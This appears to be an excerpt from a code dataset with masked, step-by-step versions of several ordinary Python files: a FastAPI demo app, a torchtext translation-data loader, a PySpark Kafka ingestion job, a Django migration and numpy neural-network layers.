add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync 
def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-5": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\n\npayloads = {\n 'peoples': [\n {\n 'firstname': 'watcharapon',\n 'lastname': 'weeraborirak',\n 'age': '24',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'somsak',\n 'lastname': 'tamjai',\n 'age': '22',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'rakkana',\n 'lastname': 'meejai',\n 'age': '66',\n 'city': 'outcast'\n },\n ]\n}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n def get_route_handler(self) -> Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) -> Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get(\"/items_id/{item_id}\")\nasync def read_items(\n item_id: int = Path(..., title=\"The ID of the item to get\"),\n q: Optional[str] = Query(None, alias=\"item-query\")\n):\n results = {\"item_id\": item_id}\n if q:\n results.update({\"q\": q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str = None): # query param string\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str = Header(...)): # Header\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail=\"X-Item-ID header invalid\")\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str = Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}') # dynamic route\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return 
item\n\n\n@app.post(\"/payload_json\")\nasync def create_item(payload: dict = Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str = Form(...), username: str = Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})\n\n\n@app.get(\"/func_element\", response_model=Item, tags=[\"Description\"], deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post(\"/func_item\", response_model=Item, tags=[\"Description\"], summary=\"Create an item\",\n description=\"Create an item with all the , name, description, price, tax and a set of unique tags\")\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from torchtext import data
from torchtext import datasets
import re
import spacy
spacy_de = spacy.load('de')
spacy_en = spacy.load('en')
url = re.compile('(<url>.*</url>)')
def tokenize_de(text):
return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]
def tokenize_en(text):
return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]
DE = data.Field(tokenize=tokenize_de)
EN = data.Field(tokenize=tokenize_en)
train, val = datasets.TranslationDataset.splits(path='~/iwslt2016/de-en/',
train='train.tags.de-en', validation='IWSLT16.TED.tst2013.de-en', exts=
('.de', '.en'), fields=(DE, EN))
print(train.fields)
print(len(train))
print(vars(train[0]))
print(vars(train[100]))
DE.build_vocab(train.src, min_freq=3)
EN.build_vocab(train.trg, max_size=50000)
train_iter, val_iter = data.BucketIterator.splits((train, val), batch_size=
3, device=0)
print(DE.vocab.freqs.most_common(10))
print(DE.vocab.size)
print(EN.vocab.freqs.most_common(10))
print(EN.vocab.size)
batch = next(iter(train_iter))
print(batch.src)
print(batch.trg)
|
normal
|
{
"blob_id": "4e715ccb4f95e7fe7e495a1181ad5df530f5a53f",
"index": 5773,
"step-1": "<mask token>\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\n<mask token>\nprint(train.fields)\nprint(len(train))\nprint(vars(train[0]))\nprint(vars(train[100]))\nDE.build_vocab(train.src, min_freq=3)\nEN.build_vocab(train.trg, max_size=50000)\n<mask token>\nprint(DE.vocab.freqs.most_common(10))\nprint(DE.vocab.size)\nprint(EN.vocab.freqs.most_common(10))\nprint(EN.vocab.size)\n<mask token>\nprint(batch.src)\nprint(batch.trg)\n",
"step-3": "<mask token>\nspacy_de = spacy.load('de')\nspacy_en = spacy.load('en')\nurl = re.compile('(<url>.*</url>)')\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\nDE = data.Field(tokenize=tokenize_de)\nEN = data.Field(tokenize=tokenize_en)\ntrain, val = datasets.TranslationDataset.splits(path='~/iwslt2016/de-en/',\n train='train.tags.de-en', validation='IWSLT16.TED.tst2013.de-en', exts=\n ('.de', '.en'), fields=(DE, EN))\nprint(train.fields)\nprint(len(train))\nprint(vars(train[0]))\nprint(vars(train[100]))\nDE.build_vocab(train.src, min_freq=3)\nEN.build_vocab(train.trg, max_size=50000)\ntrain_iter, val_iter = data.BucketIterator.splits((train, val), batch_size=\n 3, device=0)\nprint(DE.vocab.freqs.most_common(10))\nprint(DE.vocab.size)\nprint(EN.vocab.freqs.most_common(10))\nprint(EN.vocab.size)\nbatch = next(iter(train_iter))\nprint(batch.src)\nprint(batch.trg)\n",
"step-4": "from torchtext import data\nfrom torchtext import datasets\nimport re\nimport spacy\nspacy_de = spacy.load('de')\nspacy_en = spacy.load('en')\nurl = re.compile('(<url>.*</url>)')\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\nDE = data.Field(tokenize=tokenize_de)\nEN = data.Field(tokenize=tokenize_en)\ntrain, val = datasets.TranslationDataset.splits(path='~/iwslt2016/de-en/',\n train='train.tags.de-en', validation='IWSLT16.TED.tst2013.de-en', exts=\n ('.de', '.en'), fields=(DE, EN))\nprint(train.fields)\nprint(len(train))\nprint(vars(train[0]))\nprint(vars(train[100]))\nDE.build_vocab(train.src, min_freq=3)\nEN.build_vocab(train.trg, max_size=50000)\ntrain_iter, val_iter = data.BucketIterator.splits((train, val), batch_size=\n 3, device=0)\nprint(DE.vocab.freqs.most_common(10))\nprint(DE.vocab.size)\nprint(EN.vocab.freqs.most_common(10))\nprint(EN.vocab.size)\nbatch = next(iter(train_iter))\nprint(batch.src)\nprint(batch.trg)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
from pyspark.sql.types import StructType, StructField, StringType, TimestampType, IntegerType
from main.config.spark_config import SparkConfiguration
import main.config.constants as Constants
from main.connectors.kafka_connector import KafkaConnector, extract_json_data
def main():
# Configure Spark Session
config = {
"spark.jars.packages": "io.delta:delta-core_2.12:0.8.0,"
"org.postgresql:postgresql:9.4.1211,"
"org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,"
"org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0",
"spark.sql.extensions": "io.delta.sql.DeltaSparkSessionExtension",
"spark.driver.memory": "8g",
"spark.sql.catalog.spark_catalog": "org.apache.spark.sql.delta.catalog.DeltaCatalog",
Constants.DELTA_SRC_PATH: Constants.DELTA_LOCATION,
Constants.POSTGRESQL_DB: Constants.POSTGRESQL_DB_VALUE,
Constants.POSTGRESQL_USER: Constants.POSTGRESQL_USER_VALUE,
Constants.POSTGRESQL_PASSWORD: Constants.POSTGRESQL_PASSWORD_VALUE,
Constants.POSTGRESQL_HOST: Constants.POSTGRESQL_HOST_VALUE,
Constants.KAFKA_SERVER: Constants.KAFKA_SERVER_NAME,
}
spark_configuration = SparkConfiguration(app_name="visits_ads_event_ingestion", spark_master="local[4]",
log_level="WARN", configuration=config)
import main.orchestrator as Orchestrator
########################
# Visit events ingestion
########################
visits_schema = StructType([
StructField('id_user', IntegerType(), False),
StructField('id_video', IntegerType(), False),
StructField('id_device', IntegerType(), False),
StructField('id_location', IntegerType(), False),
StructField('visit_date', TimestampType(), True)
])
visits_stream = KafkaConnector(spark_configuration).get_stream('visits', start_from_begining=False).load()
visits_stream = extract_json_data(visits_stream, visits_schema)
# For each micro-batch of visit events
visits_stream.writeStream \
.option("checkpointLocation", "checkpoint/visits") \
.foreachBatch(lambda visits_batch, index: Orchestrator.ingest_visits(visits_batch, spark_configuration, index))\
.start()
# Await stream termination
spark_configuration.spark_session.streams.awaitAnyTermination()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "23099b29fb5898c2556d1612690e33860662ca35",
"index": 9846,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n config = {'spark.jars.packages':\n 'io.delta:delta-core_2.12:0.8.0,org.postgresql:postgresql:9.4.1211,org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0'\n , 'spark.sql.extensions': 'io.delta.sql.DeltaSparkSessionExtension',\n 'spark.driver.memory': '8g', 'spark.sql.catalog.spark_catalog':\n 'org.apache.spark.sql.delta.catalog.DeltaCatalog', Constants.\n DELTA_SRC_PATH: Constants.DELTA_LOCATION, Constants.POSTGRESQL_DB:\n Constants.POSTGRESQL_DB_VALUE, Constants.POSTGRESQL_USER: Constants\n .POSTGRESQL_USER_VALUE, Constants.POSTGRESQL_PASSWORD: Constants.\n POSTGRESQL_PASSWORD_VALUE, Constants.POSTGRESQL_HOST: Constants.\n POSTGRESQL_HOST_VALUE, Constants.KAFKA_SERVER: Constants.\n KAFKA_SERVER_NAME}\n spark_configuration = SparkConfiguration(app_name=\n 'visits_ads_event_ingestion', spark_master='local[4]', log_level=\n 'WARN', configuration=config)\n import main.orchestrator as Orchestrator\n visits_schema = StructType([StructField('id_user', IntegerType(), False\n ), StructField('id_video', IntegerType(), False), StructField(\n 'id_device', IntegerType(), False), StructField('id_location',\n IntegerType(), False), StructField('visit_date', TimestampType(), \n True)])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits',\n start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n visits_stream.writeStream.option('checkpointLocation', 'checkpoint/visits'\n ).foreachBatch(lambda visits_batch, index: Orchestrator.\n ingest_visits(visits_batch, spark_configuration, index)).start()\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n config = {'spark.jars.packages':\n 'io.delta:delta-core_2.12:0.8.0,org.postgresql:postgresql:9.4.1211,org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0'\n , 'spark.sql.extensions': 'io.delta.sql.DeltaSparkSessionExtension',\n 'spark.driver.memory': '8g', 'spark.sql.catalog.spark_catalog':\n 'org.apache.spark.sql.delta.catalog.DeltaCatalog', Constants.\n DELTA_SRC_PATH: Constants.DELTA_LOCATION, Constants.POSTGRESQL_DB:\n Constants.POSTGRESQL_DB_VALUE, Constants.POSTGRESQL_USER: Constants\n .POSTGRESQL_USER_VALUE, Constants.POSTGRESQL_PASSWORD: Constants.\n POSTGRESQL_PASSWORD_VALUE, Constants.POSTGRESQL_HOST: Constants.\n POSTGRESQL_HOST_VALUE, Constants.KAFKA_SERVER: Constants.\n KAFKA_SERVER_NAME}\n spark_configuration = SparkConfiguration(app_name=\n 'visits_ads_event_ingestion', spark_master='local[4]', log_level=\n 'WARN', configuration=config)\n import main.orchestrator as Orchestrator\n visits_schema = StructType([StructField('id_user', IntegerType(), False\n ), StructField('id_video', IntegerType(), False), StructField(\n 'id_device', IntegerType(), False), StructField('id_location',\n IntegerType(), False), StructField('visit_date', TimestampType(), \n True)])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits',\n start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n visits_stream.writeStream.option('checkpointLocation', 'checkpoint/visits'\n ).foreachBatch(lambda visits_batch, index: Orchestrator.\n ingest_visits(visits_batch, spark_configuration, index)).start()\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from pyspark.sql.types import StructType, StructField, StringType, TimestampType, IntegerType\nfrom main.config.spark_config import SparkConfiguration\nimport main.config.constants as Constants\nfrom main.connectors.kafka_connector import KafkaConnector, extract_json_data\n\n\ndef main():\n config = {'spark.jars.packages':\n 'io.delta:delta-core_2.12:0.8.0,org.postgresql:postgresql:9.4.1211,org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0'\n , 'spark.sql.extensions': 'io.delta.sql.DeltaSparkSessionExtension',\n 'spark.driver.memory': '8g', 'spark.sql.catalog.spark_catalog':\n 'org.apache.spark.sql.delta.catalog.DeltaCatalog', Constants.\n DELTA_SRC_PATH: Constants.DELTA_LOCATION, Constants.POSTGRESQL_DB:\n Constants.POSTGRESQL_DB_VALUE, Constants.POSTGRESQL_USER: Constants\n .POSTGRESQL_USER_VALUE, Constants.POSTGRESQL_PASSWORD: Constants.\n POSTGRESQL_PASSWORD_VALUE, Constants.POSTGRESQL_HOST: Constants.\n POSTGRESQL_HOST_VALUE, Constants.KAFKA_SERVER: Constants.\n KAFKA_SERVER_NAME}\n spark_configuration = SparkConfiguration(app_name=\n 'visits_ads_event_ingestion', spark_master='local[4]', log_level=\n 'WARN', configuration=config)\n import main.orchestrator as Orchestrator\n visits_schema = StructType([StructField('id_user', IntegerType(), False\n ), StructField('id_video', IntegerType(), False), StructField(\n 'id_device', IntegerType(), False), StructField('id_location',\n IntegerType(), False), StructField('visit_date', TimestampType(), \n True)])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits',\n start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n visits_stream.writeStream.option('checkpointLocation', 'checkpoint/visits'\n ).foreachBatch(lambda visits_batch, index: Orchestrator.\n ingest_visits(visits_batch, spark_configuration, index)).start()\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from pyspark.sql.types import StructType, StructField, StringType, TimestampType, IntegerType\nfrom main.config.spark_config import SparkConfiguration\nimport main.config.constants as Constants\nfrom main.connectors.kafka_connector import KafkaConnector, extract_json_data\n\n\ndef main():\n # Configure Spark Session\n config = {\n \"spark.jars.packages\": \"io.delta:delta-core_2.12:0.8.0,\"\n \"org.postgresql:postgresql:9.4.1211,\"\n \"org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,\"\n \"org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0\",\n \"spark.sql.extensions\": \"io.delta.sql.DeltaSparkSessionExtension\",\n \"spark.driver.memory\": \"8g\",\n \"spark.sql.catalog.spark_catalog\": \"org.apache.spark.sql.delta.catalog.DeltaCatalog\",\n Constants.DELTA_SRC_PATH: Constants.DELTA_LOCATION,\n Constants.POSTGRESQL_DB: Constants.POSTGRESQL_DB_VALUE,\n Constants.POSTGRESQL_USER: Constants.POSTGRESQL_USER_VALUE,\n Constants.POSTGRESQL_PASSWORD: Constants.POSTGRESQL_PASSWORD_VALUE,\n Constants.POSTGRESQL_HOST: Constants.POSTGRESQL_HOST_VALUE,\n Constants.KAFKA_SERVER: Constants.KAFKA_SERVER_NAME,\n }\n spark_configuration = SparkConfiguration(app_name=\"visits_ads_event_ingestion\", spark_master=\"local[4]\",\n log_level=\"WARN\", configuration=config)\n import main.orchestrator as Orchestrator\n\n ########################\n # Visit events ingestion\n ########################\n\n visits_schema = StructType([\n StructField('id_user', IntegerType(), False),\n StructField('id_video', IntegerType(), False),\n StructField('id_device', IntegerType(), False),\n StructField('id_location', IntegerType(), False),\n StructField('visit_date', TimestampType(), True)\n ])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits', start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n\n # For each micro-batch of visit events\n visits_stream.writeStream \\\n .option(\"checkpointLocation\", \"checkpoint/visits\") \\\n .foreachBatch(lambda visits_batch, index: Orchestrator.ingest_visits(visits_batch, spark_configuration, index))\\\n .start()\n\n # Await stream termination\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.1.1 on 2018-09-24 04:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('backend', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Aro',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=255, unique=True)),
],
),
migrations.AddField(
model_name='bicicleta',
name='modelo',
field=models.CharField(default=1, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='bicicleta',
name='numero_serie',
field=models.CharField(default=1, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='bicicleta',
name='aro',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),
preserve_default=False,
),
]
|
normal
|
{
"blob_id": "8dff22249abbae9e30ba1ad423457270e0cd9b20",
"index": 7027,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('backend', '0001_initial')]\n operations = [migrations.CreateModel(name='Aro', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('nombre', models.CharField(max_length=255,\n unique=True))]), migrations.AddField(model_name='bicicleta', name=\n 'modelo', field=models.CharField(default=1, max_length=255),\n preserve_default=False), migrations.AddField(model_name='bicicleta',\n name='numero_serie', field=models.CharField(default=1, max_length=\n 255), preserve_default=False), migrations.AddField(model_name=\n 'bicicleta', name='aro', field=models.ForeignKey(default=1,\n on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),\n preserve_default=False)]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('backend', '0001_initial')]\n operations = [migrations.CreateModel(name='Aro', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('nombre', models.CharField(max_length=255,\n unique=True))]), migrations.AddField(model_name='bicicleta', name=\n 'modelo', field=models.CharField(default=1, max_length=255),\n preserve_default=False), migrations.AddField(model_name='bicicleta',\n name='numero_serie', field=models.CharField(default=1, max_length=\n 255), preserve_default=False), migrations.AddField(model_name=\n 'bicicleta', name='aro', field=models.ForeignKey(default=1,\n on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),\n preserve_default=False)]\n",
"step-5": "# Generated by Django 2.1.1 on 2018-09-24 04:59\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('backend', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aro',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=255, unique=True)),\n ],\n ),\n migrations.AddField(\n model_name='bicicleta',\n name='modelo',\n field=models.CharField(default=1, max_length=255),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='bicicleta',\n name='numero_serie',\n field=models.CharField(default=1, max_length=255),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='bicicleta',\n name='aro',\n field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
class Layer:
def __init__(self):
pass
@property
def need_update(self):
return False
class FC(Layer):
def __init__(self, W, b, lr, decay, epoch_drop, l2=0):
self.W = W.copy()
self.b = b.copy()
self.alpha_0 = lr
self.decay = decay
self.epoch_drop = epoch_drop
self.l2 = l2
self.count = 0
def forward(self, x):
self.x = x.copy()
self.m, self.n = x.shape
return np.dot(self.x, self.W) + self.b
def backprop(self, back_grad):
self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W
self.grad_b = np.dot(np.ones(self.m), back_grad)
self.grad = np.dot(back_grad, self.W.T)
return self.grad
def l_rate(self):
lrate = self.alpha_0 * \
(self.decay ** (np.floor((1 + self.count) / self.epoch_drop)))
self.count += 1
return lrate
def update(self):
lr = self.l_rate()
self.W -= lr * self.grad_W
self.b -= lr * self.grad_b
@property
def need_update(self):
return True
class Sigmoid(Layer):
def forward(self, x):
self.x = x.copy()
self.sig_res = 1 / (1 + np.exp(-x))
return self.sig_res
def backprop(self, back_grad):
grad = back_grad * self.sig_res * (1 - self.sig_res)
return grad
class Relu(Layer):
def forward(self, x):
self.x = x.copy()
return np.maximum(x, 0)
def backprop(self, back_grad):
grad = back_grad.copy()
grad[self.x < 0] = 0
return grad
class Leaky_Relu(Layer):
def forward(self, x):
self.x = x.copy()
return np.maximum(x, self.x * 0.01)
def backprop(self, back_grad):
grad = back_grad.copy()
grad[self.x < 0] = grad[self.x < 0] * 0.01
return grad
class Tanh(Layer):
def forward(self, x):
self.x = x.copy()
self.tanh = np.tanh(x)
return self.tanh
def backprop(self, back_grad):
grad = back_grad * (1 - self.tanh ** 2)
return grad
class Arctan(Layer):
def forward(self, x):
self.x = x.copy()
return np.arctan(self.x)
def backprop(self, back_grad):
grad = back_grad / (1 + self.x ** 2)
return grad
class SoftPlus(Layer):
def forward(self, x):
self.x = x.copy()
return np.log(1 + np.exp(self.x))
def backprop(self, back_grad):
grad = back_grad / (1 + np.exp(-self.x))
return grad
class SoftSign(Layer):
def forward(self, x):
self.x = x.copy()
return self.x / (1 + np.abs(self.x))
def backprop(self, back_grad):
grad = back_grad / (1 + np.abs(self.x) ** 2)
return grad
class Softmax(Layer):
def forward(self, x, y):
self.x = (x.copy() - x.max(axis=1).reshape(-1, 1))
# Avoiding overflow of exp(),
# This operation doesn't change the output of CE
self.y = y.copy()
self.m, self.n = self.x.shape
self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))
self.softmax = np.exp(x) / self.denom
loss = 0
for i in range(self.m):
loss -= np.log(self.softmax[i, y[i]])
return loss / self.m
def dirac(self, a, b):
return 1 if a == b else 0
def backprop(self):
grad = np.zeros([self.m, self.n])
for i in range(self.m):
for j in range(self.n):
grad[i, j] = (self.softmax[i, j] -
self.dirac(j, self.y[i])) / self.m
return grad
def get_act_func(layer_name):
activation_function_dict = {
"arctan": Arctan,
"l_relu": Leaky_Relu,
"relu": Relu,
"sigmoid": Sigmoid,
"tanh": Tanh,
"softplus": SoftPlus,
"softsign": SoftSign
}
return activation_function_dict[layer_name]()
|
normal
|
{
"blob_id": "a5a764586faabb5af58f4649cdd20b6b18236a99",
"index": 6080,
"step-1": "<mask token>\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
